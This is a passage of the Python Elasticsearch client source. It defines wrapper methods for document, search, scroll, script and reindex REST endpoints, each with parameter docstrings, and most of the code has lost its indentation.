that must be active before proceeding with the index operation. Defaults
to 1, meaning the primary shard only. Set to `all` for all shard copies,
otherwise set to any non-negative value less than or equal to the total
number of copies for the shard (number of replicas + 1)
"""
for param in (index, body):
if param in SKIP_IN_PATH:
raise ValueError("Empty value passed for a required argument.")
if doc_type is None:
doc_type = "_doc"
return self.transport.perform_request(
"POST" if id in SKIP_IN_PATH else "PUT",
_make_path(index, doc_type, id),
params=params,
body=body,
)
@query_params(
"_source",
"_source_excludes",
"_source_includes",
"pipeline",
"refresh",
"routing",
"timeout",
"wait_for_active_shards",
)
def bulk(self, body, index=None, doc_type=None, params=None):
"""
Allows to perform multiple index/update/delete operations in a single request.
`<https://www.elastic.co/guide/en/elasticsearch/reference/master/docs-bulk.html>`_
:arg body: The operation definition and data (action-data
pairs), separated by newlines
:arg index: Default index for items which don't provide one
:arg doc_type: Default document type for items which don't
provide one
:arg _source: True or false to return the _source field or not,
or default list of fields to return, can be overridden on each sub-
request
:arg _source_excludes: Default list of fields to exclude from
the returned _source field, can be overridden on each sub-request
:arg _source_includes: Default list of fields to extract and
return from the _source field, can be overridden on each sub-request
:arg doc_type: Default document type for items which don't
provide one
:arg pipeline: The pipeline id to preprocess incoming documents
with
:arg refresh: If `true` then refresh the effected shards to make
this operation visible to search, if `wait_for` then wait for a refresh
to make this operation visible to search, if `false` (the default) then
do nothing with refreshes. Valid choices: true, false, wait_for
:arg routing: Specific routing value
:arg timeout: Explicit operation timeout
:arg wait_for_active_shards: Sets the number of shard copies
that must be active before proceeding with the bulk operation. Defaults
to 1, meaning the primary shard only. Set to `all` for all shard copies,
otherwise set to any non-negative value less than or equal to the total
number of copies for the shard (number of replicas + 1)
"""
if body in SKIP_IN_PATH:
raise ValueError("Empty value passed for a required argument 'body'.")
body = _bulk_body(self.transport.serializer, body)
return self.transport.perform_request(
"POST", _make_path(index, doc_type, "_bulk"), params=params, body=body
)
    @query_params()
    def clear_scroll(self, body=None, scroll_id=None, params=None):
        """
        Explicitly clears the search context for a scroll.

        `<https://www.elastic.co/guide/en/elasticsearch/reference/master/search-request-body.html#_clear_scroll_api>`_

        :arg body: A comma-separated list of scroll IDs to clear if none
            was specified via the scroll_id parameter
        :arg scroll_id: A comma-separated list of scroll IDs to clear
        """
        # Precedence: at least one of scroll_id/body is required; a lone
        # scroll_id is folded into the request body; when both are given the
        # body wins and scroll_id is sent as a query parameter instead.
        if scroll_id in SKIP_IN_PATH and body in SKIP_IN_PATH:
            raise ValueError("You need to supply scroll_id or body.")
        elif scroll_id and not body:
            body = {"scroll_id": [scroll_id]}
        elif scroll_id:
            params["scroll_id"] = scroll_id

        return self.transport.perform_request(
            "DELETE", "/_search/scroll", params=params, body=body
        )
    def custom_clear_scroll(self, body):
        """Custom scroll-deletion helper.

        Unlike :meth:`clear_scroll` this method bypasses the
        ``@query_params`` machinery and sends the caller-supplied body to
        ``DELETE /_search/scroll`` verbatim, with no query parameters.

        :arg body: request body, e.g. ``{"scroll_id": [...]}``
        """
        return self.transport.perform_request(
            "DELETE", "/_search/scroll", params=None, body=body
        )
@query_params(
"allow_no_indices",
"analyze_wildcard",
"analyzer",
"default_operator",
"df",
"expand_wildcards",
"ignore_throttled",
"ignore_unavailable",
"lenient",
"min_score",
"preference",
"q",
"routing",
"terminate_after",
)
def count(self, body=None, index=None, doc_type=None, params=None):
"""
Returns number of documents matching a query.
`<https://www.elastic.co/guide/en/elasticsearch/reference/master/search-count.html>`_
:arg body: A query to restrict the results specified with the
Query DSL (optional)
:arg index: A comma-separated list of indices to restrict the
results
:arg doc_type: A comma-separated list of types to restrict the
results
:arg allow_no_indices: Whether to ignore if a wildcard indices
expression resolves into no concrete indices. (This includes `_all`
string or when no indices have been specified)
:arg analyze_wildcard: Specify whether wildcard and prefix
queries should be analyzed (default: false)
:arg analyzer: The analyzer to use for the query string
:arg default_operator: The default operator for query string
query (AND or OR) Valid choices: AND, OR Default: OR
:arg df: The field to use as default where no field prefix is
given in the query string
:arg expand_wildcards: Whether to expand wildcard expression to
concrete indices that are open, closed or both. Valid choices: open,
closed, none, all Default: open
:arg ignore_throttled: Whether specified concrete, expanded or
aliased indices should be ignored when throttled
:arg ignore_unavailable: Whether specified concrete indices
should be ignored when unavailable (missing or closed)
:arg lenient: Specify whether format-based query failures (such
as providing text to a numeric field) should be ignored
:arg min_score: Include only documents with a specific `_score`
value in the result
:arg preference: Specify the node or shard the operation should
be performed on (default: random)
:arg q: Query in the Lucene query string syntax
:arg routing: A comma-separated list of specific routing values
:arg terminate_after: The maximum count for each shard, upon
reaching which the query execution will terminate early
"""
return self.transport.perform_request(
"POST", _make_path(index, doc_type, "_count"), params=params, body=body
)
@query_params(
"if_primary_term",
"if_seq_no",
"refresh",
"routing",
"timeout",
"version",
"version_type",
"wait_for_active_shards",
)
def delete(self, index, id, doc_type=None, params=None):
"""
Removes a document from the index.
`<https://www.elastic.co/guide/en/elasticsearch/reference/master/docs-delete.html>`_
:arg index: The name of the index
:arg id: The document ID
:arg doc_type: The type of the document
:arg if_primary_term: only perform the delete operation if the
last operation that has changed the document has the specified primary
term
:arg if_seq_no: only perform the delete operation if the last
operation that has changed the document has the specified sequence
number
:arg refresh: If `true` then refresh the effected shards to make
this operation visible to search, if `wait_for` then wait for a refresh
to make this operation visible to search, if `false` (the default) then
do nothing with refreshes. Valid choices: true, false, wait_for
:arg routing: Specific routing value
:arg timeout: Explicit operation timeout
:arg version: Explicit version number for concurrency control
:arg version_type: Specific version type Valid choices:
internal, external, external_gte, force
:arg wait_for_active_shards: Sets the number of shard copies
that must be active before proceeding with the delete operation.
Defaults to 1, meaning the primary shard only. Set to `all` for all
shard copies, otherwise set to any non-negative value less than or equal
to the total number of copies for the shard (number of replicas + 1)
"""
for param in (index, id):
if param in SKIP_IN_PATH:
raise ValueError("Empty value passed for a required argument.")
if doc_type in SKIP_IN_PATH:
doc_type = "_doc"
return self.transport.perform_request(
"DELETE", _make_path(index, doc_type, id), params=params
)
@query_params(
"_source",
"_source_excludes",
"_source_includes",
"allow_no_indices",
"analyze_wildcard",
"conflicts",
"default_operator",
"df",
"expand_wildcards",
"from_",
"ignore_unavailable",
"lenient",
"max_docs",
"preference",
"q",
"refresh",
"request_cache",
"requests_per_second",
"routing",
"scroll",
"scroll_size",
"search_timeout",
"search_type",
"size",
"slices",
"sort",
"stats",
"terminate_after",
"timeout",
"version",
"wait_for_active_shards",
"wait_for_completion",
)
def delete_by_query(self, index, body, doc_type=None, params=None):
"""
Deletes documents matching the provided query.
`<https://www.elastic.co/guide/en/elasticsearch/reference/master/docs-delete-by-query.html>`_
:arg index: A comma-separated list of index names to search; use
`_all` or empty string to perform the operation on all indices
:arg body: The search definition using the Query DSL
:arg doc_type: A comma-separated list of document types to
search; leave empty to perform the operation on all types
:arg _source: True or false to return the _source field or not,
or a list of fields to return
:arg _source_excludes: A list of fields to exclude from the
returned _source field
:arg _source_includes: A list of fields to extract and return
from the _source field
:arg allow_no_indices: Whether to ignore if a wildcard indices
expression resolves into no concrete indices. (This includes `_all`
string or when no indices have been specified)
:arg analyze_wildcard: Specify whether wildcard and prefix
queries should be analyzed (default: false)
:arg conflicts: What to do when the delete by query hits version
conflicts? Valid choices: abort, proceed Default: abort
:arg default_operator: The default operator for query string
query (AND or OR) Valid choices: AND, OR Default: OR
:arg df: The field to use as default where no field prefix is
given in the query string
:arg expand_wildcards: Whether to expand wildcard expression to
concrete indices that are open, closed or both. Valid choices: open,
closed, none, all Default: open
:arg from_: Starting offset (default: 0)
:arg ignore_unavailable: Whether specified concrete indices
should be ignored when unavailable (missing or closed)
:arg lenient: Specify whether format-based query failures (such
as providing text to a numeric field) should be ignored
:arg max_docs: Maximum number of documents to process (default:
all documents)
:arg preference: Specify the node or shard the operation should
be performed on (default: random)
:arg q: Query in the Lucene query string syntax
:arg refresh: Should the effected indexes be refreshed?
:arg request_cache: Specify if request cache should be used for
this request or not, defaults to index level setting
:arg requests_per_second: The throttle for this request in sub-
requests per second. -1 means no throttle.
:arg routing: A comma-separated list of specific routing values
:arg scroll: Specify how long a consistent view of the index
should be maintained for scrolled search
:arg scroll_size: Size on the scroll request powering the delete
by query
:arg search_timeout: Explicit timeout for each search request.
Defaults to no timeout.
:arg search_type: Search operation type Valid choices:
query_then_fetch, dfs_query_then_fetch
:arg size: Deprecated, please use `max_docs` instead
:arg slices: The number of slices this task should be divided
into. Defaults to 1 meaning the task isn't sliced into subtasks.
Default: 1
:arg sort: A comma-separated list of <field>:<direction> pairs
:arg stats: Specific 'tag' of the request for logging and
statistical purposes
:arg terminate_after: The maximum number of documents to collect
for each shard, upon reaching which the query execution will terminate
early.
:arg timeout: Time each individual bulk request should wait for
shards that are unavailable. Default: 1m
:arg version: Specify whether to return document version as part
of a hit
:arg wait_for_active_shards: Sets the number of shard copies
that must be active before proceeding with the delete by query
operation. Defaults to 1, meaning the primary shard only. Set to `all`
for all shard copies, otherwise set to any non-negative value less than
or equal to the total number of copies for the shard (number of replicas
+ 1)
:arg wait_for_completion: Should the request should block until
the delete by query is complete. Default: True
"""
# from is a reserved word so it cannot be used, use from_ instead
if "from_" in params:
params["from"] = params.pop("from_")
for param in (index, body):
if param in SKIP_IN_PATH:
raise ValueError("Empty value passed for a required argument.")
return self.transport.perform_request(
"POST",
_make_path(index, doc_type, "_delete_by_query"),
params=params,
body=body,
)
@query_params("requests_per_second")
def delete_by_query_rethrottle(self, task_id, params=None):
"""
Changes the number of requests per second for a particular Delete By Query
operation.
`<https://www.elastic.co/guide/en/elasticsearch/reference/current/docs-delete-by-query.html>`_
:arg task_id: The task id to rethrottle
:arg requests_per_second: The throttle to set on this request in
floating sub-requests per second. -1 means set no throttle.
"""
if task_id in SKIP_IN_PATH:
raise ValueError("Empty value passed for a required argument 'task_id'.")
return self.transport.perform_request(
"POST",
_make_path("_delete_by_query", task_id, "_rethrottle"),
params=params,
)
@query_params("master_timeout", "timeout")
def delete_script(self, id, params=None):
"""
Deletes a script.
`<https://www.elastic.co/guide/en/elasticsearch/reference/master/modules-scripting.html>`_
:arg id: Script ID
:arg master_timeout: Specify timeout for connection to master
:arg timeout: Explicit operation timeout
"""
if id in SKIP_IN_PATH:
raise ValueError("Empty value passed for a required argument 'id'.")
return self.transport.perform_request(
"DELETE", _make_path("_scripts", id), params=params
)
@query_params(
"_source",
"_source_excludes",
"_source_includes",
"preference",
"realtime",
"refresh",
"routing",
"stored_fields",
"version",
"version_type",
)
def exists(self, index, id, doc_type=None, params=None):
"""
Returns information about whether a document exists in an index.
`<https://www.elastic.co/guide/en/elasticsearch/reference/master/docs-get.html>`_
:arg index: The name of the index
:arg id: The document ID
:arg doc_type: The type of the document (use `_all` to fetch the
first document matching the ID across all types)
:arg _source: True or false to return the _source field or not,
or a list of fields to return
:arg _source_excludes: A list of fields to exclude from the
returned _source field
:arg _source_includes: A list of fields to extract and return
from the _source field
:arg preference: Specify the node or shard the operation should
be performed on (default: random)
:arg realtime: Specify whether to perform the operation in
realtime or search mode
:arg refresh: Refresh the shard containing the document before
performing the operation
:arg routing: Specific routing value
:arg stored_fields: A comma-separated list of stored fields to
return in the response
:arg version: Explicit version number for concurrency control
:arg version_type: Specific version type Valid choices:
internal, external, external_gte, force
"""
for param in (index, id):
if param in SKIP_IN_PATH:
raise ValueError("Empty value passed for a required argument.")
if doc_type in SKIP_IN_PATH:
doc_type = "_doc"
return self.transport.perform_request(
"HEAD", _make_path(index, doc_type, id), params=params
)
@query_params(
"_source",
"_source_excludes",
"_source_includes",
"preference",
"realtime",
"refresh",
"routing",
"version",
"version_type",
)
def exists_source(self, index, id, doc_type=None, params=None):
"""
Returns information about whether a document source exists in an index.
`<https://www.elastic.co/guide/en/elasticsearch/reference/master/docs-get.html>`_
:arg index: The name of the index
:arg id: The document ID
:arg doc_type: The type of the document; deprecated and optional
starting with 7.0
:arg _source: True or false to return the _source field or not,
or a list of fields to return
:arg _source_excludes: A list of fields to exclude from the
returned _source field
:arg _source_includes: A list of fields to extract and return
from the _source field
:arg preference: Specify the node or shard the operation should
be performed on (default: random)
:arg realtime: Specify whether to perform the operation in
realtime or search mode
:arg refresh: Refresh the shard containing the document before
performing the operation
:arg routing: Specific routing value
:arg version: Explicit version number for concurrency control
:arg version_type: Specific version type Valid choices:
internal, external, external_gte, force
"""
for param in (index, id):
if param in SKIP_IN_PATH:
raise ValueError("Empty value passed for a required argument.")
return self.transport.perform_request(
"HEAD", _make_path(index, doc_type, id, "_source"), params=params
)
@query_params(
"_source",
"_source_excludes",
"_source_includes",
"analyze_wildcard",
"analyzer",
"default_operator",
"df",
"lenient",
"preference",
"q",
"routing",
"stored_fields",
)
def explain(self, index, id, body=None, doc_type=None, params=None):
"""
Returns information about why a specific matches (or doesn't match) a query.
`<https://www.elastic.co/guide/en/elasticsearch/reference/master/search-explain.html>`_
:arg index: The name of the index
:arg id: The document ID
:arg body: The query definition using the Query DSL
:arg doc_type: The type of the document
:arg _source: True or false to return the _source field or not,
or a list of fields to return
:arg _source_excludes: A list of fields to exclude from the
returned _source field
:arg _source_includes: A list of fields to extract and return
from the _source field
:arg analyze_wildcard: Specify whether wildcards and prefix
queries in the query string query should be analyzed (default: false)
:arg analyzer: The analyzer for the query string query
:arg default_operator: The default operator for query string
query (AND or OR) Valid choices: AND, OR Default: OR
:arg df: The default field for query string query (default:
_all)
:arg lenient: Specify whether format-based query failures (such
as providing text to a numeric field) should be ignored
:arg preference: Specify the node or shard the operation should
be performed on (default: random)
:arg q: Query in the Lucene query string syntax
:arg routing: Specific routing value
:arg stored_fields: A comma-separated list of stored fields to
return in the response
"""
for param in (index, id):
if param in SKIP_IN_PATH:
raise ValueError("Empty value passed for a required argument.")
if doc_type in SKIP_IN_PATH:
doc_type = "_doc"
return self.transport.perform_request(
"GET", _make_path(index, doc_type, id, "_explain"), params=params, body=body
)
@query_params(
"allow_no_indices",
"expand_wildcards",
"fields",
"ignore_unavailable",
"include_unmapped",
)
def field_caps(self, index=None, params=None):
"""
Returns the information about the capabilities of fields among multiple
indices.
`<https://www.elastic.co/guide/en/elasticsearch/reference/master/search-field-caps.html>`_
:arg index: A comma-separated list of index names; use `_all` or
empty string to perform the operation on all indices
:arg allow_no_indices: Whether to ignore if a wildcard indices
expression resolves into no concrete indices. (This includes `_all`
string or when no indices have been specified)
:arg expand_wildcards: Whether to expand wildcard expression to
concrete indices that are open, closed or both. Valid choices: open,
closed, none, all Default: open
:arg fields: A comma-separated list of field names
:arg ignore_unavailable: Whether specified concrete indices
should be ignored when unavailable (missing or closed)
:arg include_unmapped: Indicates whether unmapped fields should
be included in the response.
"""
return self.transport.perform_request(
"GET", _make_path(index, "_field_caps"), params=params
)
@query_params(
"_source",
"_source_excludes",
"_source_includes",
"preference",
"realtime",
"refresh",
"routing",
"stored_fields",
"version",
"version_type",
)
def get(self, index, id, doc_type=None, params=None):
"""
Returns a document.
`<https://www.elastic.co/guide/en/elasticsearch/reference/master/docs-get.html>`_
:arg index: The name of the index
:arg id: The document ID
:arg doc_type: The type of the document (use `_all` to fetch the
first document matching the ID across all types)
:arg _source: True or false to return the _source field or not,
or a list of fields to return
:arg _source_excludes: A list of fields to exclude from the
returned _source field
:arg _source_includes: A list of fields to extract and return
from the _source field
:arg preference: Specify the node or shard the operation should
be performed on (default: random)
:arg realtime: Specify whether to perform the operation in
realtime or search mode
:arg refresh: Refresh the shard containing the document before
performing the operation
:arg routing: Specific routing value
:arg stored_fields: A comma-separated list of stored fields to
return in the response
:arg version: Explicit version number for concurrency control
:arg version_type: Specific version type Valid choices:
internal, external, external_gte, force
"""
for param in (index, id):
if param in SKIP_IN_PATH:
raise ValueError("Empty value passed for a required argument.")
if doc_type in SKIP_IN_PATH:
doc_type = "_doc"
return self.transport.perform_request(
"GET", _make_path(index, doc_type, id), params=params
)
@query_params("master_timeout")
def get_script(self, id, params=None):
"""
Returns a script.
`<https://www.elastic.co/guide/en/elasticsearch/reference/master/modules-scripting.html>`_
:arg id: Script ID
:arg master_timeout: Specify timeout for connection to master
"""
if id in SKIP_IN_PATH:
raise ValueError("Empty value passed for a required argument 'id'.")
return self.transport.perform_request(
"GET", _make_path("_scripts", id), params=params
)
@query_params(
"_source",
"_source_excludes",
"_source_includes",
"preference",
"realtime",
"refresh",
"routing",
"version",
"version_type",
)
def get_source(self, index, id, doc_type=None, params=None):
"""
Returns the source of a document.
`<https://www.elastic.co/guide/en/elasticsearch/reference/master/docs-get.html>`_
:arg index: The name of the index
:arg id: The document ID
:arg doc_type: The type of the document; deprecated and optional
starting with 7.0
:arg _source: True or false to return the _source field or not,
or a list of fields to return
:arg _source_excludes: A list of fields to exclude from the
returned _source field
:arg _source_includes: A list of fields to extract and return
from the _source field
:arg preference: Specify the node or shard the operation should
be performed on (default: random)
:arg realtime: Specify whether to perform the operation in
realtime or search mode
:arg refresh: Refresh the shard containing the document before
performing the operation
:arg routing: Specific routing value
:arg version: Explicit version number for concurrency control
:arg version_type: Specific version type Valid choices:
internal, external, external_gte, force
"""
for param in (index, id):
if param in SKIP_IN_PATH:
raise ValueError("Empty value passed for a required argument.")
if doc_type in SKIP_IN_PATH:
doc_type = "_doc"
return self.transport.perform_request(
"GET", _make_path(index, doc_type, id, "_source"), params=params
)
@query_params(
"_source",
"_source_excludes",
"_source_includes",
"preference",
"realtime",
"refresh",
"routing",
"stored_fields",
)
def mget(self, body, index=None, doc_type=None, params=None):
"""
Allows to get multiple documents in one request.
`<https://www.elastic.co/guide/en/elasticsearch/reference/master/docs-multi-get.html>`_
:arg body: Document identifiers; can be either `docs`
(containing full document information) or `ids` (when index and type is
provided in the URL.
:arg index: The name of the index
:arg doc_type: The type of the document
:arg _source: True or false to return the _source field or not,
or a list of fields to return
:arg _source_excludes: A list of fields to exclude from the
returned _source field
:arg _source_includes: A list of fields to extract and return
from the _source field
:arg preference: Specify the node or shard the operation should
be performed on (default: random)
:arg realtime: Specify whether to perform the operation in
realtime or search mode
:arg refresh: Refresh the shard containing the document before
performing the operation
:arg routing: Specific routing value
:arg stored_fields: A comma-separated list of stored fields to
return in the response
"""
if body in SKIP_IN_PATH:
raise ValueError("Empty value passed for a required argument 'body'.")
return self.transport.perform_request(
"GET", _make_path(index, doc_type, "_mget"), params=params, body=body
)
@query_params(
"ccs_minimize_roundtrips",
"max_concurrent_searches",
"max_concurrent_shard_requests",
"pre_filter_shard_size",
"rest_total_hits_as_int",
"search_type",
"typed_keys",
)
def msearch(self, body, index=None, doc_type=None, params=None):
"""
Allows to execute several search operations in one request.
`<https://www.elastic.co/guide/en/elasticsearch/reference/master/search-multi-search.html>`_
:arg body: The request definitions (metadata-search request
definition pairs), separated by newlines
:arg index: A comma-separated list of index names to use as
default
:arg doc_type: A comma-separated list of document types to use
as default
:arg ccs_minimize_roundtrips: Indicates whether network round-
trips should be minimized as part of cross-cluster search requests
execution Default: true
:arg max_concurrent_searches: Controls the maximum number of
concurrent searches the multi search api will execute
:arg max_concurrent_shard_requests: The number of concurrent
shard requests each sub search executes concurrently per node. This
value should be used to limit the impact of the search on the cluster in
order to limit the number of concurrent shard requests Default: 5
:arg pre_filter_shard_size: A threshold that enforces a pre-
filter roundtrip to prefilter search shards based on query rewriting if
the number of shards the search request expands to exceeds the
threshold. This filter roundtrip can limit the number of shards
significantly if for instance a shard can not match any documents based
on it's rewrite method ie. if date filters are mandatory to match but
the shard bounds and the query are disjoint. Default: 128
:arg rest_total_hits_as_int: Indicates whether hits.total should
be rendered as an integer or an object in the rest search response
:arg search_type: Search operation type Valid choices:
query_then_fetch, query_and_fetch, dfs_query_then_fetch,
dfs_query_and_fetch
:arg typed_keys: Specify whether aggregation and suggester names
should be prefixed by their respective types in the response
"""
if body in SKIP_IN_PATH:
raise ValueError("Empty value passed for a required argument 'body'.")
body = _bulk_body(self.transport.serializer, body)
return self.transport.perform_request(
"GET", _make_path(index, doc_type, "_msearch"), params=params, body=body
)
@query_params(
"max_concurrent_searches", "rest_total_hits_as_int", "search_type", "typed_keys"
)
def msearch_template(self, body, index=None, doc_type=None, params=None):
"""
Allows to execute several search template operations in one request.
`<https://www.elastic.co/guide/en/elasticsearch/reference/current/search-multi-search.html>`_
:arg body: The request definitions (metadata-search request
definition pairs), separated by newlines
:arg index: A comma-separated list of index names to use as
default
:arg doc_type: A comma-separated list of document types to use
as default
:arg max_concurrent_searches: Controls the maximum number of
concurrent searches the multi search api will execute
:arg rest_total_hits_as_int: Indicates whether hits.total should
be rendered as an integer or an object in the rest search response
:arg search_type: Search operation type Valid choices:
query_then_fetch, query_and_fetch, dfs_query_then_fetch,
dfs_query_and_fetch
:arg typed_keys: Specify whether aggregation and suggester names
should be prefixed by their respective types in the response
"""
if body in SKIP_IN_PATH:
raise ValueError("Empty value passed for a required argument 'body'.")
body = _bulk_body(self.transport.serializer, body)
return self.transport.perform_request(
"GET",
_make_path(index, doc_type, "_msearch", "template"),
params=params,
body=body,
)
@query_params(
"field_statistics",
"fields",
"ids",
"offsets",
"payloads",
"positions",
"preference",
"realtime",
"routing",
"term_statistics",
"version",
"version_type",
)
def mtermvectors(self, body=None, index=None, doc_type=None, params=None):
"""
Returns multiple termvectors in one request.
`<https://www.elastic.co/guide/en/elasticsearch/reference/master/docs-multi-termvectors.html>`_
:arg body: Define ids, documents, parameters or a list of
parameters per document here. You must at least provide a list of
document ids. See documentation.
:arg index: The index in which the document resides.
:arg doc_type: The type of the document.
:arg field_statistics: Specifies if document count, sum of
document frequencies and sum of total term frequencies should be
returned. Applies to all returned documents unless otherwise specified
in body "params" or "docs". Default: True
:arg fields: A comma-separated list of fields to return. Applies
to all returned documents unless otherwise specified in body "params" or
"docs".
:arg ids: A comma-separated list of documents ids. You must
define ids as parameter or set "ids" or "docs" in the request body
:arg offsets: Specifies if term offsets should be returned.
Applies to all returned documents unless otherwise specified in body
"params" or "docs". Default: True
:arg payloads: Specifies if term payloads should be returned.
Applies to all returned documents unless otherwise specified in body
"params" or "docs". Default: True
:arg positions: Specifies if term positions should be returned.
Applies to all returned documents unless otherwise specified in body
"params" or "docs". Default: True
:arg preference: Specify the node or shard the operation should
be performed on (default: random) .Applies to all returned documents
unless otherwise specified in body "params" or "docs".
:arg realtime: Specifies if requests are real-time as opposed to
near-real-time (default: true).
:arg routing: Specific routing value. Applies to all returned
documents unless otherwise specified in body "params" or "docs".
:arg term_statistics: Specifies if total term frequency and
document frequency should be returned. Applies to all returned documents
unless otherwise specified in body "params" or "docs".
:arg version: Explicit version number for concurrency control
:arg version_type: Specific version type Valid choices:
internal, external, external_gte, force
"""
return self.transport.perform_request(
"GET",
_make_path(index, doc_type, "_mtermvectors"),
params=params,
body=body,
)
@query_params("master_timeout", "timeout")
def put_script(self, id, body, context=None, params=None):
"""
Creates or updates a script.
`<https://www.elastic.co/guide/en/elasticsearch/reference/master/modules-scripting.html>`_
:arg id: Script ID
:arg body: The document
:arg context: Script context
:arg context: Context name to compile script against
:arg master_timeout: Specify timeout for connection to master
:arg timeout: Explicit operation timeout
"""
for param in (id, body):
if param in SKIP_IN_PATH:
raise ValueError("Empty value passed for a required argument.")
return self.transport.perform_request(
"PUT", _make_path("_scripts", id, context), params=params, body=body
)
@query_params("allow_no_indices", "expand_wildcards", "ignore_unavailable")
def rank_eval(self, body, index=None, params=None):
"""
Allows to evaluate the quality of ranked search results over a set of typical
search queries
`<https://www.elastic.co/guide/en/elasticsearch/reference/master/search-rank-eval.html>`_
:arg body: The ranking evaluation search definition, including
search requests, document ratings and ranking metric definition.
:arg index: A comma-separated list of index names to search; use
`_all` or empty string to perform the operation on all indices
:arg allow_no_indices: Whether to ignore if a wildcard indices
expression resolves into no concrete indices. (This includes `_all`
string or when no indices have been specified)
:arg expand_wildcards: Whether to expand wildcard expression to
concrete indices that are open, closed or both. Valid choices: open,
closed, none, all Default: open
:arg ignore_unavailable: Whether specified concrete indices
should be ignored when unavailable (missing or closed)
"""
if body in SKIP_IN_PATH:
raise ValueError("Empty value passed for a required argument 'body'.")
return self.transport.perform_request(
"GET", _make_path(index, "_rank_eval"), params=params, body=body
)
@query_params(
"max_docs",
"refresh",
"requests_per_second",
"scroll",
"slices",
"timeout",
"wait_for_active_shards",
"wait_for_completion",
)
def reindex(self, body, params=None):
"""
Allows to copy documents from one index to another, optionally filtering the
source documents by a query, changing the destination index settings, or
fetching the documents from a remote cluster.
`<https://www.elastic.co/guide/en/elasticsearch/reference/master/docs-reindex.html>`_
:arg body: The search definition using the Query DSL and the
prototype for the index request.
:arg max_docs: Maximum number of documents to process (default:
all documents)
:arg refresh: Should the effected indexes be refreshed?
:arg requests_per_second: The throttle to set on this request in
sub-requests per second. -1 means no throttle.
:arg scroll: Control how long to keep the search context alive
Default: 5m
:arg slices: The number of slices this task should be divided
into. Defaults to 1 meaning the task isn't sliced into subtasks.
Default: 1
:arg timeout: Time each individual bulk request should wait for
shards that are unavailable. Default: 1m
:arg wait_for_active_shards: Sets the number of shard copies
that must be active before proceeding with the reindex operation.
Defaults to 1, meaning the primary shard only. Set to `all` for all
shard copies, otherwise set to any non-negative value less than or equal
to the total number of copies for the shard (number of replicas + 1)
:arg wait_for_completion: Should the request should block until
the reindex is complete. Default: True
"""
if body in SKIP_IN_PATH:
raise ValueError("Empty value passed for a required argument 'body'.")
return self.transport.perform_request(
"POST", "/_reindex", params=params, body=body
)
@query_params("requests_per_second")
def reindex_rethrottle(self, task_id, params=None):
"""
Changes the number of requests per second for a particular Reindex operation.
`<https://www.elastic.co/guide/en/elasticsearch/reference/master/docs-reindex.html>`_
:arg task_id: The task id to rethrottle
:arg requests_per_second: The throttle to set on this request in
floating sub-requests per second. -1 means set no throttle.
"""
if task_id in SKIP_IN_PATH:
raise ValueError("Empty value passed for a required argument 'task_id'.")
return self.transport.perform_request(
"POST", _make_path("_reindex", task_id, "_rethrottle"), params=params
)
@query_params()
def render_search_template(self, body=None, id=None, params=None):
"""
Allows to use the Mustache language to pre-render a search definition.
`<https://www.elastic.co/guide/en/elasticsearch/reference/current/search-template.html#_validating_templates>`_
:arg body: The search definition template and its params
:arg id: The id of the stored search template
"""
return self.transport.perform_request(
"GET", _make_path("_render", "template", id), params=params, body=body
)
@query_params()
def scripts_painless_execute(self, body=None, params=None):
"""
Allows an arbitrary script to be executed and a result to be returned
`<https://www.elastic.co/guide/en/elasticsearch/painless/master/painless-execute-api.html>`_
:arg body: The script to execute
"""
return self.transport.perform_request(
"GET", "/_scripts/painless/_execute", params=params, body=body
)
@query_params("rest_total_hits_as_int", "scroll")
def scroll(self, body=None, scroll_id=None, params=None):
"""
Allows to retrieve a large numbers of results from a single search request.
`<https://www.elastic.co/guide/en/elasticsearch/reference/master/search-request-body.html#request-body-search-scroll>`_
:arg body: The scroll ID if not passed by URL or query
parameter.
:arg scroll_id: The scroll ID
:arg rest_total_hits_as_int: Indicates whether hits.total should
be rendered as an integer or an object in the rest search response
:arg scroll: Specify how long a consistent view of the index
should be maintained for scrolled search
:arg scroll_id: The scroll ID for scrolled search
"""
if scroll_id in SKIP_IN_PATH and body in SKIP_IN_PATH:
raise ValueError("You need to supply scroll_id or body.")
elif scroll_id and not body:
body = {"scroll_id": scroll_id}
elif scroll_id:
params["scroll_id"] = scroll_id
return self.transport.perform_request(
"GET", "/_search/scroll", params=params, body=body
)
@query_params(
"_source",
"_source_excludes",
"_source_includes",
"allow_no_indices",
"allow_partial_search_results",
"analyze_wildcard",
"analyzer",
"batched_reduce_size",
"ccs_minimize_roundtrips",
"default_operator",
"df",
"docvalue_fields",
"expand_wildcards",
"explain",
"from_",
"ignore_throttled",
"ignore_unavailable",
"lenient",
"max_concurrent_shard_requests",
"pre_filter_shard_size",
"preference",
"q",
"request_cache",
"rest_total_hits_as_int",
"routing",
"scroll",
"search_type",
"seq_no_primary_term",
"size",
"sort",
"stats",
"stored_fields",
"suggest_field",
"suggest_mode",
"suggest_size",
"suggest_text",
"terminate_after",
"timeout",
"track_scores",
"track_total_hits",
"typed_keys",
"version",
)
def search(self, body=None, index=None, doc_type=None, params=None):
"""
Returns results matching a query.
`<https://www.elastic.co/guide/en/elasticsearch/reference/master/search-search.html>`_
:arg body: The search definition using the Query DSL
:arg index: A comma-separated list of index names to search; use
`_all` or empty string to perform the operation on all indices
:arg doc_type: A comma-separated list of document types to
search; leave empty to perform the operation on all types
:arg _source: True or false to return the _source field or not,
or a list of fields to return
:arg _source_excludes: A list of fields to exclude from the
returned _source field
:arg _source_includes: A list of fields to extract and return
from the _source field
:arg allow_no_indices: Whether to ignore if a wildcard indices
expression resolves into no concrete indices. (This includes `_all`
string or when no indices have been specified)
:arg allow_partial_search_results: Indicate if an error should
be returned if there is a partial search failure or timeout Default:
True
:arg analyze_wildcard: Specify whether wildcard and prefix
queries should be analyzed (default: false)
:arg analyzer: The analyzer to use for the query string
:arg batched_reduce_size: The number of shard results that
should be reduced at once on the coordinating node. This value should be
used as a protection mechanism to reduce the memory overhead per search
request if the potential number of shards in the request can be large.
Default: 512
:arg ccs_minimize_roundtrips: Indicates whether network round-
trips should be minimized as part of cross-cluster search requests
execution Default: true
:arg default_operator: The default operator for query string
query (AND or OR) Valid choices: AND, OR Default: OR
:arg df: The field to use as default where no field prefix is
given in the query string
:arg docvalue_fields: A comma-separated list of fields to return
as the docvalue representation of a field for each hit
:arg expand_wildcards: Whether to expand wildcard expression to
concrete indices that are open, closed or both. Valid choices: open,
closed, none, all Default: open
:arg explain: Specify whether to return detailed information
about score computation as part of a hit
:arg from_: Starting offset (default: 0)
:arg ignore_throttled: Whether specified concrete, expanded or
aliased indices should be ignored when throttled
:arg ignore_unavailable: Whether specified concrete indices
should be ignored when unavailable (missing or closed)
:arg lenient: Specify whether format-based query failures (such
as providing text to a numeric field) should be ignored
